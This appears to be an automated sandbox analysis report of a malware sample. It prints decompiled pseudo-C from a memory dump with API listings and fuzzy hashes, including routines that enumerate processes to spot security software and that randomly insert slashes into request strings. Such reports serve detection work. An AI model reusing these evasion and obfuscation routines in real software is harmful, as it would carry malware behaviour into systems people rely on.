                        
                        				_t6 =  *0x477a2c8; // 0xbd092303
                        				_t32 = _a4;
                        				_a4 = _t6 ^ 0xd05b5869;
                        				_t8 =  *0x477a2d0; // 0x96d5a8
                        				_t3 = _t8 + 0x477b84d; // 0x61636f4c
                        				_t25 = 0;
                        				_t30 = E04771970(_t3, 1);
                        				if(_t30 != 0) {
                        					_t25 = CreateEventA(0x477a2d4, 1, 0, _t30);
                        					E04772A03(_t30);
                        				}
                        				_t12 =  *0x477a2b4; // 0x4000000a
                        				if(_t12 != 6 || _t12 < 2) {
                        					if( *_t32 != 0 && E047719E7() == 0) {
                        						_t28 =  *0x477a124( *_t32, 0x20);
                        						if(_t28 != 0) {
                        							 *_t28 =  *_t28 & 0x00000000;
                        							_t28 =  &(_t28[1]);
                        						}
                        						_t31 = E047763CD(0, _t28,  *_t32, 0);
                        						if(_t31 == 0) {
                        							if(_t25 == 0) {
                        								goto L21;
                        							}
                        							_t31 = WaitForSingleObject(_t25, 0x4e20);
                        							if(_t31 == 0) {
                        								goto L19;
                        							}
                        						}
                        					}
                        					goto L11;
                        				} else {
                        					L11:
                        					_t27 = _a8;
                        					if(_t27 != 0) {
                        						 *_t27 =  *_t27 | 0x00000001;
                        					}
                        					_t31 = E04777836(_t32, _t26);
                        					if(_t31 == 0 && _t25 != 0) {
                        						_t31 = WaitForSingleObject(_t25, 0x4e20);
                        					}
                        					if(_t27 != 0 && _t31 != 0) {
                        						 *_t27 =  *_t27 & 0xfffffffe;
                        					}
                        					L19:
                        					if(_t25 != 0) {
                        						CloseHandle(_t25);
                        					}
                        					L21:
                        					return _t31;
                        				}
                        			}
















                        APIs
                          • Part of subcall function 04771970: lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,04773EC5,74666F53,00000000,?,00000000,?,?,04772F4F), ref: 047719A6
                          • Part of subcall function 04771970: lstrcpy.KERNEL32(00000000,00000000), ref: 047719CA
                          • Part of subcall function 04771970: lstrcat.KERNEL32(00000000,00000000), ref: 047719D2
                        • CreateEventA.KERNEL32(0477A2D4,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,04777338,?,?,?), ref: 04774D14
                          • Part of subcall function 04772A03: RtlFreeHeap.NTDLL(00000000,00000000,04774072,00000000,?,?,00000000,?,?,?,?,?,?,047744AE,00000000), ref: 04772A0F
                        • WaitForSingleObject.KERNEL32(00000000,00004E20,04777338,00000000,?,00000000,?,04777338,?,?,?,?,?,?,?,04771C40), ref: 04774D72
                        • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,04777338,?,?,?), ref: 04774DA0
                        • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,04777338,?,?,?), ref: 04774DB8
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                        • String ID:
                        • API String ID: 73268831-0
                        • Opcode ID: c132c1d6ce0c6921aa6b36cca048d861b694ec33a53a57b79647b31f3394cf45
                        • Instruction ID: 88d90c648bb266bc44181ecc05802930d8f5a8e5cad86b9ecfbcb57d1141ad4d
                        • Opcode Fuzzy Hash: c132c1d6ce0c6921aa6b36cca048d861b694ec33a53a57b79647b31f3394cf45
                        • Instruction Fuzzy Hash: C221B172601722BBEF214EA89948B9A73E9FF49715FC58624FF8197340EB74EC00C680
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 39%
                        			E04777289(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                        				intOrPtr _v12;
                        				void* _v16;
                        				void* _v28;
                        				char _v32;
                        				void* __esi;
                        				void* _t29;
                        				void* _t38;
                        				signed int* _t39;
                        				void* _t40;
                        
                        				_t36 = __ecx;
                        				_v32 = 0;
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosd");
                        				_v12 = _a4;
                        				_t38 = E04772616(__ecx,  &_v32);
                        				if(_t38 != 0) {
                        					L12:
                        					_t39 = _a8;
                        					L13:
                        					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                        						_t23 =  &(_t39[1]);
                        						if(_t39[1] != 0) {
                        							E047728B8(_t23);
                        						}
                        					}
                        					return _t38;
                        				}
                        				if(E04774380(0x40,  &_v16) != 0) {
                        					_v16 = 0;
                        				}
                        				_t40 = CreateEventA(0x477a2d4, 1, 0,  *0x477a394);
                        				if(_t40 != 0) {
                        					SetEvent(_t40);
                        					Sleep(0xbb8);
                        					CloseHandle(_t40);
                        				}
                        				_push( &_v32);
                        				if(_a12 == 0) {
                        					_t29 = E04777360(_t36);
                        				} else {
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					_t29 = E0477202E(_t36);
                        				}
                        				_t41 = _v16;
                        				_t38 = _t29;
                        				if(_v16 != 0) {
                        					E04773EFA(_t41);
                        				}
                        				if(_t38 != 0) {
                        					goto L12;
                        				} else {
                        					_t39 = _a8;
                        					_t38 = E04774CD5( &_v32, _t39);
                        					goto L13;
                        				}
                        			}













                        APIs
                        • CreateEventA.KERNEL32(0477A2D4,00000001,00000000,00000040,?,?,73BCF710,00000000,73BCF730,?,?,?,?,04771C40,?,00000001), ref: 047772DA
                        • SetEvent.KERNEL32(00000000,?,?,?,?,04771C40,?,00000001,04772F7D,00000002,?,?,04772F7D), ref: 047772E7
                        • Sleep.KERNEL32(00000BB8,?,?,?,?,04771C40,?,00000001,04772F7D,00000002,?,?,04772F7D), ref: 047772F2
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,04771C40,?,00000001,04772F7D,00000002,?,?,04772F7D), ref: 047772F9
                          • Part of subcall function 04777360: WaitForSingleObject.KERNEL32(00000000,?,?,?,04777319,?,04777319,?,?,?,?,?,04777319,?), ref: 0477743A
                          • Part of subcall function 04777360: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,04777319,?,?,?,?,?,04771C40,?), ref: 04777462
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: CloseEvent$CreateHandleObjectSingleSleepWait
                        • String ID:
                        • API String ID: 467273019-0
                        • Opcode ID: 7f869f5695feb8844f7293c183bcc5e011643246f650612f45bd544780836779
                        • Instruction ID: 13762c10bcc015006e43872ca55083401b22b8f03277bea6a1135b6e7aa1e9d0
                        • Opcode Fuzzy Hash: 7f869f5695feb8844f7293c183bcc5e011643246f650612f45bd544780836779
                        • Instruction Fuzzy Hash: 35216573A0025AABEF10AFE588848EE77B9EB44254BC54875EA15E7340E774F941CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E04774138(unsigned int __eax, void* __ecx) {
                        				void* _v8;
                        				void* _v12;
                        				signed int _t21;
                        				signed short _t23;
                        				char* _t27;
                        				void* _t29;
                        				void* _t30;
                        				unsigned int _t33;
                        				void* _t37;
                        				unsigned int _t38;
                        				void* _t41;
                        				void* _t42;
                        				int _t45;
                        				void* _t46;
                        
                        				_t42 = __eax;
                        				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                        				_t38 = __eax;
                        				_t30 = RtlAllocateHeap( *0x477a290, 0, (__eax >> 3) + __eax + 1);
                        				_v12 = _t30;
                        				if(_t30 != 0) {
                        					_v8 = _t42;
                        					do {
                        						_t33 = 0x18;
                        						if(_t38 <= _t33) {
                        							_t33 = _t38;
                        						}
                        						_t21 =  *0x477a2a8; // 0xb29674c9
                        						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                        						 *0x477a2a8 = _t23;
                        						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                        						memcpy(_t30, _v8, _t45);
                        						_v8 = _v8 + _t45;
                        						_t27 = _t30 + _t45;
                        						_t38 = _t38 - _t45;
                        						_t46 = _t46 + 0xc;
                        						 *_t27 = 0x2f;
                        						_t13 = _t27 + 1; // 0x1
                        						_t30 = _t13;
                        					} while (_t38 > 8);
                        					memcpy(_t30, _v8, _t38 + 1);
                        				}
                        				return _v12;
                        			}


















                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04775B76,00000000,?,00000000,04776301,00000000,050E9630), ref: 04774143
                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 0477415B
                        • memcpy.NTDLL(00000000,050E9630,-00000008,?,?,?,04775B76,00000000,?,00000000,04776301,00000000,050E9630), ref: 0477419F
                        • memcpy.NTDLL(00000001,050E9630,00000001,04776301,00000000,050E9630), ref: 047741C0
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: memcpy$AllocateHeaplstrlen
                        • String ID:
                        • API String ID: 1819133394-0
                        • Opcode ID: 27725a865a0d0a6f4da5e98d62d1adfae43eb6daaf30537d77890fec7be836f6
                        • Instruction ID: db9b9202e47f1d7e30e5a4500428439515b1dc308eb2b3e831a9980e8bbbd410
                        • Opcode Fuzzy Hash: 27725a865a0d0a6f4da5e98d62d1adfae43eb6daaf30537d77890fec7be836f6
                        • Instruction Fuzzy Hash: 351129B2A00215BFD710CF69DC88DDEBBAEEBD52A0B954176F904D7250EB74AE04C760
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 53%
                        			E047749BA(char* __eax) {
                        				char* _t8;
                        				intOrPtr _t12;
                        				char* _t21;
                        				signed int _t23;
                        				char* _t24;
                        				signed int _t26;
                        				void* _t27;
                        
                        				_t21 = __eax;
                        				_push(0x20);
                        				_t23 = 1;
                        				_push(__eax);
                        				while(1) {
                        					_t8 = StrChrA();
                        					if(_t8 == 0) {
                        						break;
                        					}
                        					_t23 = _t23 + 1;
                        					_push(0x20);
                        					_push( &(_t8[1]));
                        				}
                        				_t12 = E04775C4E(_t23 << 2);
                        				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                        				if(_t12 != 0) {
                        					StrTrimA(_t21, 0x47792c4);
                        					_t26 = 0;
                        					do {
                        						_t24 = StrChrA(_t21, 0x20);
                        						if(_t24 != 0) {
                        							 *_t24 = 0;
                        							_t24 =  &(_t24[1]);
                        							StrTrimA(_t24, 0x47792c4);
                        						}
                        						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                        						_t26 = _t26 + 1;
                        						_t21 = _t24;
                        					} while (_t24 != 0);
                        					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                        				}
                        				return 0;
                        			}











                        APIs
                        • StrChrA.SHLWAPI(?,00000020,00000000,050E962C,?,?,?,04776072,050E962C,?,?,04772F44), ref: 047749D4
                        • StrTrimA.SHLWAPI(?,047792C4,00000002,?,?,?,04776072,050E962C,?,?,04772F44), ref: 047749F3
                        • StrChrA.SHLWAPI(?,00000020,?,?,?,04776072,050E962C,?,?,04772F44,?,?,?,?,?,047744F9), ref: 047749FE
                        • StrTrimA.SHLWAPI(00000001,047792C4,?,?,?,04776072,050E962C,?,?,04772F44,?,?,?,?,?,047744F9), ref: 04774A10
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: Trim
                        • String ID:
                        • API String ID: 3043112668-0
                        • Opcode ID: 41ab4576b7ee6dd26b992c8f0df561813fc8bf0343d5c1c08db360e3ca81b4f3
                        • Instruction ID: 67cb4bbcdba4bfa26bfaa5f775664649d27792193714e60e709a3ee6760609a4
                        • Opcode Fuzzy Hash: 41ab4576b7ee6dd26b992c8f0df561813fc8bf0343d5c1c08db360e3ca81b4f3
                        • Instruction Fuzzy Hash: 7901DDB16053116FE731DE55DC49F2B7FE8EB46AA0F520919F581C7340EB64DC018AA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 6C53E2FC
                          • Part of subcall function 6C542000: __lock.LIBCMT ref: 6C542011
                        • std::exception::exception.LIBCMT ref: 6C53E35D
                          • Part of subcall function 6C544920: std::exception::_Copy_str.LIBCMT ref: 6C544939
                        • __CxxThrowException@8.LIBCMT ref: 6C53E374
                          • Part of subcall function 6C544A87: RaiseException.KERNEL32(?,00000000,?,?,00000000), ref: 6C544ADC
                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6C53E37B
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrow__lockstd::exception::_std::exception::exception
                        • String ID:
                        • API String ID: 271752322-0
                        • Opcode ID: 2b3b6e6723eb042a15c1c769ed2a318c639cbbde6adf2725a4a49a7e420fb218
                        • Instruction ID: 75e84e18f0d0d47583a09adfd5bcab01d07b0f87cfba9ac1ed6c61a328e24978
                        • Opcode Fuzzy Hash: 2b3b6e6723eb042a15c1c769ed2a318c639cbbde6adf2725a4a49a7e420fb218
                        • Instruction Fuzzy Hash: 3F2117B1408B809FD320CF29CC45B47BBE4BB59318F048E1EE489D7B51E775A508CBA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • ___BuildCatchObject.LIBCMT ref: 6C545D60
                          • Part of subcall function 6C546388: ___BuildCatchObjectHelper.LIBCMT ref: 6C5463BA
                          • Part of subcall function 6C546388: ___AdjustPointer.LIBCMT ref: 6C5463D1
                        • _UnwindNestedFrames.LIBCMT ref: 6C545D77
                        • ___FrameUnwindToState.LIBCMT ref: 6C545D89
                        • CallCatchBlock.LIBCMT ref: 6C545DAD
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                        • String ID:
                        • API String ID: 2901542994-0
                        • Opcode ID: c8c05acd160c18110a825d926067d22bf0635e9fd943c4b85a96cd4fad5b6d9c
                        • Instruction ID: 06ef5a2d8d22aa8a92496df2168eaa61385d82b55d0d916cf3263432c2d04bcf
                        • Opcode Fuzzy Hash: c8c05acd160c18110a825d926067d22bf0635e9fd943c4b85a96cd4fad5b6d9c
                        • Instruction Fuzzy Hash: F501E932000609FBCF129F65CC04EDA7BBAEF89758F558115F91866620D732E965DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                        • String ID:
                        • API String ID: 3016257755-0
                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                        • Instruction ID: aeb5e0d8d14cba1a8152e2aa050c80c04b4ab79af9873b8d7e3320efd685411a
                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                        • Instruction Fuzzy Hash: C9014C3208024AFBCF029E84DC01DEE7F22BF59358F549915FE2898530D376D9B1AB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 53%
                        			E04771970(intOrPtr _a4, intOrPtr _a8) {
                        				char _v20;
                        				void* _t8;
                        				void* _t13;
                        				void* _t16;
                        				char* _t18;
                        				void* _t19;
                        
                        				_t19 = 0x27;
                        				_t1 =  &_v20; // 0x74666f53
                        				_t18 = 0;
                        				E0477354E(_t8, _t1);
                        				_t16 = E04775C4E(_t19);
                        				if(_t16 != 0) {
                        					_t3 =  &_v20; // 0x74666f53
                        					_t13 = E0477756E(_t3, _t16, _a8);
                        					if(_a4 != 0) {
                        						__imp__(_a4);
                        						_t19 = _t13 + 0x27;
                        					}
                        					_t18 = E04775C4E(_t19);
                        					if(_t18 != 0) {
                        						 *_t18 = 0;
                        						if(_a4 != 0) {
                        							__imp__(_t18, _a4);
                        						}
                        						__imp__(_t18, _t16);
                        					}
                        					E04772A03(_t16);
                        				}
                        				return _t18;
                        			}









                        APIs
                          • Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A
                          • Part of subcall function 0477756E: wsprintfA.USER32 ref: 047775CA
                        • lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,04773EC5,74666F53,00000000,?,00000000,?,?,04772F4F), ref: 047719A6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 047719CA
                        • lstrcat.KERNEL32(00000000,00000000), ref: 047719D2
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                        • String ID: Soft
                        • API String ID: 393707159-3753413193
                        • Opcode ID: 65b828ffe50e3048b6c2e1cb2b03dbcc8344dc99e944e564622b1b51c33c7c80
                        • Instruction ID: 68010239b02df0a8bfcee301d193305afdd4030554dec62bebfda2a03be116d1
                        • Opcode Fuzzy Hash: 65b828ffe50e3048b6c2e1cb2b03dbcc8344dc99e944e564622b1b51c33c7c80
                        • Instruction Fuzzy Hash: E001F27210024AB7EF222B658C88AEE3BADEF80248F844025F90455305DB38A946C7A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E047719E7() {
                        				char _v264;
                        				void* _v300;
                        				int _t8;
                        				intOrPtr _t9;
                        				int _t15;
                        				void* _t17;
                        
                        				_t15 = 0;
                        				_t17 = CreateToolhelp32Snapshot(2, 0);
                        				if(_t17 != 0) {
                        					_t8 = Process32First(_t17,  &_v300);
                        					while(_t8 != 0) {
                        						_t9 =  *0x477a2d0; // 0x96d5a8
                        						_t2 = _t9 + 0x477be04; // 0x73617661
                        						_push( &_v264);
                        						if( *0x477a11c() != 0) {
                        							_t15 = 1;
                        						} else {
                        							_t8 = Process32Next(_t17,  &_v300);
                        							continue;
                        						}
                        						L7:
                        						CloseHandle(_t17);
                        						goto L8;
                        					}
                        					goto L7;
                        				}
                        				L8:
                        				return _t15;
                        			}









                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 047719F7
                        • Process32First.KERNEL32(00000000,?), ref: 04771A0A
                        • Process32Next.KERNEL32(00000000,?), ref: 04771A36
                        • CloseHandle.KERNEL32(00000000), ref: 04771A45
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: 5373571b050dc4b470f7377a33fb5f404abbbbfc491ca05207356e85cab72859
                        • Instruction ID: bcbedbcd3c1b3932ff4ce455631a7777fdce327c790e1a3ae4b8afcd47f00444
                        • Opcode Fuzzy Hash: 5373571b050dc4b470f7377a33fb5f404abbbbfc491ca05207356e85cab72859
                        • Instruction Fuzzy Hash: BBF096726011146AEB30A6769C48EDB77BCEBC5314FC10561E905D2300EA24EA45C7A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 50%
                        			E04776027(void** __esi) {
                        				char* _v0;
                        				intOrPtr _t4;
                        				intOrPtr _t6;
                        				void* _t8;
                        				intOrPtr _t11;
                        				void* _t12;
                        				void** _t14;
                        
                        				_t14 = __esi;
                        				_t4 =  *0x477a37c; // 0x50e9630
                        				__imp__(_t4 + 0x40);
                        				while(1) {
                        					_t6 =  *0x477a37c; // 0x50e9630
                        					_t1 = _t6 + 0x58; // 0x0
                        					if( *_t1 == 0) {
                        						break;
                        					}
                        					Sleep(0xa);
                        				}
                        				_t8 =  *_t14;
                        				if(_t8 != 0 && _t8 != 0x477a030) {
                        					HeapFree( *0x477a290, 0, _t8);
                        				}
                        				_t14[1] = E047749BA(_v0, _t14);
                        				_t11 =  *0x477a37c; // 0x50e9630
                        				_t12 = _t11 + 0x40;
                        				__imp__(_t12);
                        				return _t12;
                        			}










                        APIs
                        • RtlEnterCriticalSection.NTDLL(050E95F0), ref: 04776030
                        • Sleep.KERNEL32(0000000A,?,?,04772F44,?,?,?,?,?,047744F9,?,00000001), ref: 0477603A
                        • HeapFree.KERNEL32(00000000,00000000,?,?,04772F44,?,?,?,?,?,047744F9,?,00000001), ref: 04776062
                        • RtlLeaveCriticalSection.NTDLL(050E95F0), ref: 0477607E
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                        • String ID:
                        • API String ID: 58946197-0
                        • Opcode ID: 42423ec10be3d7deeb3c8cf9fd54f28c0df8e9dff503ffb88b6afd4590c0b1c5
                        • Instruction ID: e91fc248b5100a7dc05c38fa0277c9a4f1ce377523091c736ac0a146a55399fc
                        • Opcode Fuzzy Hash: 42423ec10be3d7deeb3c8cf9fd54f28c0df8e9dff503ffb88b6afd4590c0b1c5
                        • Instruction Fuzzy Hash: 10F0F8B0211641DBFB209F39E988F9A77A4EB06755B84C805FA49D6345C638FC04CB25
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E04771547() {
                        				void* _t1;
                        				intOrPtr _t5;
                        				void* _t6;
                        				void* _t7;
                        				void* _t11;
                        
                        				_t1 =  *0x477a2c4; // 0x2e8
                        				if(_t1 == 0) {
                        					L8:
                        					return 0;
                        				}
                        				SetEvent(_t1);
                        				_t11 = 0x7fffffff;
                        				while(1) {
                        					SleepEx(0x64, 1);
                        					_t5 =  *0x477a304; // 0x0
                        					if(_t5 == 0) {
                        						break;
                        					}
                        					_t11 = _t11 - 0x64;
                        					if(_t11 > 0) {
                        						continue;
                        					}
                        					break;
                        				}
                        				_t6 =  *0x477a2c4; // 0x2e8
                        				if(_t6 != 0) {
                        					CloseHandle(_t6);
                        				}
                        				_t7 =  *0x477a290; // 0x4cf0000
                        				if(_t7 != 0) {
                        					HeapDestroy(_t7);
                        				}
                        				goto L8;
                        			}








                        APIs
                        • SetEvent.KERNEL32(000002E8,00000001,04774214), ref: 04771552
                        • SleepEx.KERNEL32(00000064,00000001), ref: 04771561
                        • CloseHandle.KERNEL32(000002E8), ref: 04771582
                        • HeapDestroy.KERNEL32(04CF0000), ref: 04771592
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: CloseDestroyEventHandleHeapSleep
                        • String ID:
                        • API String ID: 4109453060-0
                        • Opcode ID: 9cf809a2d5376e2516d2ea2355021ccffe50a4604a8b2db6003795725be01c8e
                        • Instruction ID: 9d3a332ef60f07d2e7c15175f2967b71be89de5424ae78469f2523e9db2b70e1
                        • Opcode Fuzzy Hash: 9cf809a2d5376e2516d2ea2355021ccffe50a4604a8b2db6003795725be01c8e
                        • Instruction Fuzzy Hash: F4F030F1B513129BFB245A34A90DB9E37ADEB157117C44914BA1AE3380DA2CED00C750
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 37%
                        			E0477461D() {
                        				void* _v0;
                        				void** _t3;
                        				void** _t5;
                        				void** _t7;
                        				void** _t8;
                        				void* _t10;
                        
                        				_t3 =  *0x477a37c; // 0x50e9630
                        				__imp__( &(_t3[0x10]));
                        				while(1) {
                        					_t5 =  *0x477a37c; // 0x50e9630
                        					_t1 =  &(_t5[0x16]); // 0x0
                        					if( *_t1 == 0) {
                        						break;
                        					}
                        					Sleep(0xa);
                        				}
                        				_t7 =  *0x477a37c; // 0x50e9630
                        				_t10 =  *_t7;
                        				if(_t10 != 0 && _t10 != 0x477b882) {
                        					HeapFree( *0x477a290, 0, _t10);
                        					_t7 =  *0x477a37c; // 0x50e9630
                        				}
                        				 *_t7 = _v0;
                        				_t8 =  &(_t7[0x10]);
                        				__imp__(_t8);
                        				return _t8;
                        			}









                        APIs
                        • RtlEnterCriticalSection.NTDLL(050E95F0), ref: 04774626
                        • Sleep.KERNEL32(0000000A,?,?,04772F44,?,?,?,?,?,047744F9,?,00000001), ref: 04774630
                        • HeapFree.KERNEL32(00000000,?,?,?,04772F44,?,?,?,?,?,047744F9,?,00000001), ref: 0477465E
                        • RtlLeaveCriticalSection.NTDLL(050E95F0), ref: 04774673
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File
                        Similarity
                        • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                        • String ID:
                        • API String ID: 58946197-0
                        • Opcode ID: e03c29ad1300c38381552dce2f8392de70eda502945edc0d2ada8b4d8bf19a21
                        • Instruction ID: 35a0568cf89b1262156dd58e52859b7148b0627efd5e0c02d8bd410611ff2365
                        • Opcode Fuzzy Hash: e03c29ad1300c38381552dce2f8392de70eda502945edc0d2ada8b4d8bf19a21
                        • Instruction Fuzzy Hash: 2BF0D4B8611201EBFB188F24E899EA977A4EB4A715B84C459EA0AD7350D638AC00CE15
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • _memmove.LIBCMT ref: 6C53FA62
                          • Part of subcall function 6C53EF40: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 6C53EFD0
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_memmove
                        • String ID: string too long
                        • API String ID: 2765667529-2556327735
                        • Opcode ID: d1dfbec92bbc0398621f87c904040bceccc825110e91f1c3f8b92d78891c23d7
                        • Instruction ID: f5f993bfe883df6dd9dd239aa8261ceedf3f5cc493c57bde823f956cb2d9164e
                        • Opcode Fuzzy Hash: d1dfbec92bbc0398621f87c904040bceccc825110e91f1c3f8b92d78891c23d7
                        • Instruction Fuzzy Hash: 695106722083609FD3218E3DEC90B5BB7D6EFD1310F195EAAD4D9C7A91E724984C8762
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID: invalid string position$string too long
                        • API String ID: 0-4289949731
